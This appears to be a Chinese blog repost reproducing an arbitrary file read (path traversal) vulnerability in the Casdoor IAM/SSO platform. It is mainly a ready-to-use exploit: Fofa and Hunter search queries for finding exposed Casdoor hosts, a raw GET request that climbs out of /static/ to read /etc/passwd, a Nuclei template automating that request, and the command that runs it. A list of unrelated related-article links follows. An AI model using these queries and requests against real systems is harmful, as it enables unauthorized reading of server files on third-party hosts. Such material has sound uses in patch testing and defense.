【漏洞复现】Casdoor-任意文件读取

news2024/11/20 15:16:37

目录

【漏洞介绍】

【资产测绘Query】

【漏洞复现】

【漏洞介绍】

Casdoor系统static存在任意文件读取漏洞

【漏洞描述】
Casdoor是一个基于OAuth 2.0、OIDC、SAML 和 CAS 的,UI-first的身份和访问管理(IAM)/单点登录(SSO)平台。使用 Go 和react开发,前后端分离,内置第三方应用登录服务。

【资产测绘Query】

Fofa:title:”Casdoor”
Hunter:web.title=”Casdoor”

【漏洞复现】

GET /static/../../../../../../../../../../../etc/passwd HTTP/1.1
Host: 127.0.0.1

图片


【Nuclei-Poc】

id: template-id

info:
  name: Template Name
  author: xxx
  severity: info
  description: description
  reference:
    - https://
  tags: tags

requests:
  - raw:
      - |+
        GET /static/../../../../../../../../../../../etc/passwd HTTP/1.1
        Host: {{Hostname}}
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - root
      - type: status
        status:
          - 200
      - type: regex
        regex:
          - "root:[x*]:0:0"

【验证】

nuclei.exe -duc -u http://target.com -t C:\Users\xxx\nuclei-templates\Casdoor-demo.yaml -debug

图片

图片

                                    没看够~?欢迎关注扫一扫!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1109167.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

外汇天眼:外汇投资入门必看!做好3件事,任何人都能提高交易胜率

外汇天眼:外汇投资入门必看!做好3件事,任何人都能提高交易胜率

近年来外汇市场愈来愈热络,许多投资人看准世界金融变化的趋势,纷纷开始入场布局,期望把握行情大赚一笔。 如果你之前没有做过外汇交易,建议最好先透过「外汇天眼学院」学习各种相关的知识与技术分析,等到对外汇有一定的…
阅读更多...
JDBC-day06(数据库连接池)

JDBC-day06(数据库连接池)

八:数据库连接池 1. 传统连接数据库的模式 在使用开发基于数据库的web程序时,传统的模式基本是按以下步骤: 在主程序(如servlet、bea,ns)中建立数据库连接进行sql操作断开数据库连接 传统的模式存在的问…
阅读更多...
FreeFileSync开机实时自动同步文件

FreeFileSync开机实时自动同步文件

FreeFileSync 是一款使用简单的开放源码文件夹同步和比较软件,它用于快速简便的配置和行动之间的同步两个文件夹。 RealTimeSync 是开源同步软件 FreeFileSync 附带的一个小工具,用于自动同步或者备份文件,相当于一些移动硬盘自带的备份应用…
阅读更多...
5种常见的软件缺陷分析方法

5种常见的软件缺陷分析方法

软件缺陷分析方法对于软件开发非常重要,能够帮助团队识别和分析软件中的缺陷问题,从而制定相应的解决方案,并持续改进软件质量和可靠性。通过合理应用这些方法,可以大幅提高软件开发效率和质量。 软件开发过程中,可能存…
阅读更多...
【AI视野·今日NLP 自然语言处理论文速览 第五十五期】Mon, 16 Oct 2023

【AI视野·今日NLP 自然语言处理论文速览 第五十五期】Mon, 16 Oct 2023

AI视野今日CS.NLP 自然语言处理论文速览 Mon, 16 Oct 2023 Totally 53 papers 👉上期速览✈更多精彩请移步主页 Daily Computation and Language Papers PromptRE: Weakly-Supervised Document-Level Relation Extraction via Prompting-Based Data Programming Au…
阅读更多...
LSTM-CRF模型详解和Pytorch代码实现

LSTM-CRF模型详解和Pytorch代码实现

在快速发展的自然语言处理领域,Transformers 已经成为主导模型,在广泛的序列建模任务中表现出卓越的性能,包括词性标记、命名实体识别和分块。在Transformers之前,条件随机场(CRFs)是序列建模的首选工具,特别是线性链C…
阅读更多...
OpenHarmony 持久化存储 UI 状态:PersistentStorage

OpenHarmony 持久化存储 UI 状态:PersistentStorage

前两个小节介绍的 LocalStorage 和 AppStorage 都是运行时的内存,但是在应用退出再次启动后,依然能保存选定的结果,是应用开发中十分常见的现象,这就需要用到 PersistentStorage。 PersistentStorage 是应用程序中的可选单例对象…
阅读更多...
科学指南针XPS | SEM | BET 降价:不赚钱,就和您交个朋友

科学指南针XPS | SEM | BET 降价:不赚钱,就和您交个朋友

尊敬的各位客户: 感谢您一直以来对科学指南针服务平台(下文简称:科学指南针)的支持和信任!科学指南针本着服务第一,客户至上的精神,多年来坚持为客户提供高质量的测试和服务,获得了广…
阅读更多...
将日志压缩并归档到 Amazon S3 Glacier 存储层中

将日志压缩并归档到 Amazon S3 Glacier 存储层中

在分布式架构中,经常需要保存应用程序的日志,对于亚马逊云科技的客户来说,保存通常是通过一个 Amazon S3 桶来完成。这些日志可能包含运行时事务、错误、故障状态、应用程序指标和统计信息。这些日志将被用于商业智能,以提供有用的…
阅读更多...
创龙瑞芯微RK3568参数修改(调试口波特率和rootfs文件)

创龙瑞芯微RK3568参数修改(调试口波特率和rootfs文件)

前言 前面写了基本的文件编译、系统编译和系统烧写,差不多前期工作就准备的差不多了。目前的东西能解决大部分入门级的需求。当然如果需要开发的话,还需要修改其他东西,下面一步一步的给小伙伴介绍关键参数怎么修改。 给定波特率 拿到开发板…
阅读更多...
Stable Diffusion原理

Stable Diffusion原理

一、Diffusion扩散理论 1.1、 Diffusion Model(扩散模型) Diffusion扩散模型分为两个阶段:前向过程 反向过程 前向过程:不断往输入图片中添加高斯噪声来破坏图像反向过程:使用一系列马尔可夫链逐步将噪声还原为原始…
阅读更多...
【全国大学生loT设计竞赛】安谋科技灵动赛题国二分享:MagicDog—仿生狗四足机器人

【全国大学生loT设计竞赛】安谋科技灵动赛题国二分享:MagicDog—仿生狗四足机器人

本文参加极术社区和灵动微电子组织的2022全国大学生物联网设计作品征集活动。 “全国大学生物联网设计竞赛”是以促进国内物联网相关专业建设和人才培养为目标,以物联网技术为核心,激发物联网相关专业学生的创造、创新、创业活力,推动高校创新…
阅读更多...
服装行业如何做数字化转型?

服装行业如何做数字化转型?

服装行业如何做数字化转型? (一)明确定位 企业在开启数字化转型之旅前,需要"认清自我,明确定位,持续创新"。厚鸟科技有企业数字化转型成熟度的指标定义,帮助企业进行综合评估&#…
阅读更多...
java 对接微信支付Native下单API报错: java.security.InvalidKeyException: Illegal key size

java 对接微信支付Native下单API报错: java.security.InvalidKeyException: Illegal key size

受到美国法律的约束,早期Java的运行时限制了JCE支持的密钥长度,即默认不支持256位的AES。解决的方法有三个: 1、(推荐)升级Java 8u162,默认使用ulimited policy 2、Java 8u151和8u152,可以在你的…
阅读更多...
赶快收藏不迷路,不允许你还不知道这几个程序员接单平台!!!

赶快收藏不迷路,不允许你还不知道这几个程序员接单平台!!!

作为一个每天和26键打交道的程序员,谁还不想在闲暇之余做点兼职,赚点外快呢,毕竟做人嘛,谁会和钱过不去嘞,但是你是不是还在寻找一个靠谱的线上接单平台?那这几个平台你可要收藏好了! NO.1开源众…
阅读更多...
axios get请求不能通过body 数据json数据

axios get请求不能通过body 数据json数据

axios get请求不能通过 body 传递数据,只能用query的方式,post请求传递参数用的是data这个字段,但是看官方文档 Request Config | Axios Docs
阅读更多...
一个虚拟机管理器(VMM)的实现

一个虚拟机管理器(VMM)的实现

虚拟机管理器又名虚拟机管理程序、虚拟机监控程序、VMM。它使用虚拟化技术,将一台物理机虚拟化为多台虚拟机,每台虚拟机都可以独立一个操作系统。其背后的原理也很简单,它就是一个应用程序,模拟了硬件所提供的功能,比如…
阅读更多...
虹科分享 | 赋能物流机器人:CANopen通信如何发挥重要作用?

虹科分享 | 赋能物流机器人:CANopen通信如何发挥重要作用?

现代物流领域迅速融入了技术进步,特别是随着自主机器人的兴起,这一趋势越发明显。确保这些机器人在复杂的仓库环境中精确运行的一个关键方面是CANopen通信协议。该协议集成了各种组件(电机、传感器、摄像头和先进的电池系统)&…
阅读更多...
Java基础20问(6-10)

Java基础20问(6-10)

6.Java接口和抽象类的区别? 不同点 1.接口在Java8之前不能写方法实现逻辑,Java8及以后的版本,可以用default关键字写方法的实现。 2.接口中方法都是public的,public可以省略,而抽象类没有这个限制。 3.接口用inter…
阅读更多...
防止员工私自拷贝公司资料

防止员工私自拷贝公司资料

公司资料的安全性变得越来越重要,然而,我们时常会面临一个严峻的问题:员工私自拷贝公司资料。这不仅可能导致数据泄露,还会给公司带来巨大的经济损失和声誉风险。因此,采取有效的措施来防止员工私自拷贝公司资料已势在…
阅读更多...
推荐文章
最新文章

Copyright @ 2022~2023